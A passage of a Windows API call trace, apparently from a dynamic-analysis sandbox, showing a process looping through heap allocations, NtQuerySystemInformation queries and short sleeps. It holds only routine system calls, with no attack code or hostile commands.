ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0206.671] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0206.671] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0206.671] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0206.672] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0206.672] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0206.672] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0206.672] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0206.672] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0206.673] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0206.674] Sleep (dwMilliseconds=0x110) [0206.685] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0206.685] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0206.686] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0206.686] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0206.686] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0206.687] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0206.687] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0206.687] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0206.688] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0206.688] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0206.688] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0206.689] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0206.693] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0206.693] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0206.694] Sleep (dwMilliseconds=0x110) [0206.704] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0206.704] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0206.706] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0206.706] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0206.706] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0206.707] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0206.707] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0206.708] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0206.708] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0206.708] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0206.709] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0206.709] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0206.709] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0206.710] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0206.710] Sleep (dwMilliseconds=0x110) [0206.718] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0206.718] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0206.719] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0206.719] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0206.719] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0206.719] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0206.719] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0206.719] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0206.720] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0206.720] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0206.720] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0206.720] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0206.721] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0206.721] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0206.721] Sleep (dwMilliseconds=0x110) [0206.731] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0206.731] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0206.732] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0206.735] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0206.736] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0206.736] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0206.737] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0206.737] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0206.737] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0206.737] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0206.737] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0206.738] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0206.738] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0206.739] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0206.739] Sleep (dwMilliseconds=0x110) [0206.748] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0206.749] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0206.749] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0206.749] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0206.749] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0206.750] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0206.750] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0206.751] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0206.751] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0206.752] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0206.752] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0206.753] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0206.753] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0206.753] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0206.753] Sleep (dwMilliseconds=0x110) [0206.763] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0206.764] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0206.764] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0206.764] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0206.764] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0206.765] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0206.765] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0206.765] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0206.766] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0206.889] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0206.889] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0206.890] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0206.890] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0206.891] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0206.891] Sleep (dwMilliseconds=0x110) [0206.944] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0206.944] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0206.945] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0206.948] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0206.948] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0206.949] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0206.949] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0206.951] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0206.951] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0206.952] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0206.952] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0206.952] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0206.952] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0206.953] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0206.953] Sleep (dwMilliseconds=0x110) [0206.999] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0206.999] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0207.000] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0207.000] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0207.000] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0207.000] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0207.001] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0207.001] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0207.001] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0207.001] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0207.002] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0207.002] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0207.002] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0207.003] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0207.003] Sleep (dwMilliseconds=0x110) [0207.045] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0207.045] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0207.046] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0207.046] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0207.046] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0207.047] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0207.047] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0207.047] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0207.047] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0207.047] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0207.047] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0207.048] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0207.048] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0207.049] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0207.049] Sleep (dwMilliseconds=0x110) [0207.143] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0207.143] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0207.144] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0207.144] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0207.144] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0207.144] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0207.145] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0207.145] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0207.145] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0207.145] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0207.145] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0207.146] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0207.146] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0207.146] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0207.146] Sleep (dwMilliseconds=0x110) [0207.154] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0207.154] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0207.155] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0207.155] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0207.155] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0207.155] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0207.155] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0207.156] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0207.157] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0207.179] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0207.372] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0207.373] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0207.373] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0207.374] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0207.374] Sleep (dwMilliseconds=0x110) [0207.474] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0207.474] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0207.475] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0207.475] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0207.475] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0207.475] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0207.475] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0207.476] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0207.476] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0207.476] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0207.476] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0207.476] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0207.477] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0207.478] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0207.478] Sleep (dwMilliseconds=0x110) [0207.489] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0207.489] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0207.490] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0207.490] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0207.490] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0207.490] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0207.491] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0207.491] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0207.492] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0207.492] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0207.492] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0207.492] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0207.492] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0207.493] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0207.493] Sleep (dwMilliseconds=0x110) [0207.505] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0207.505] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0207.506] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 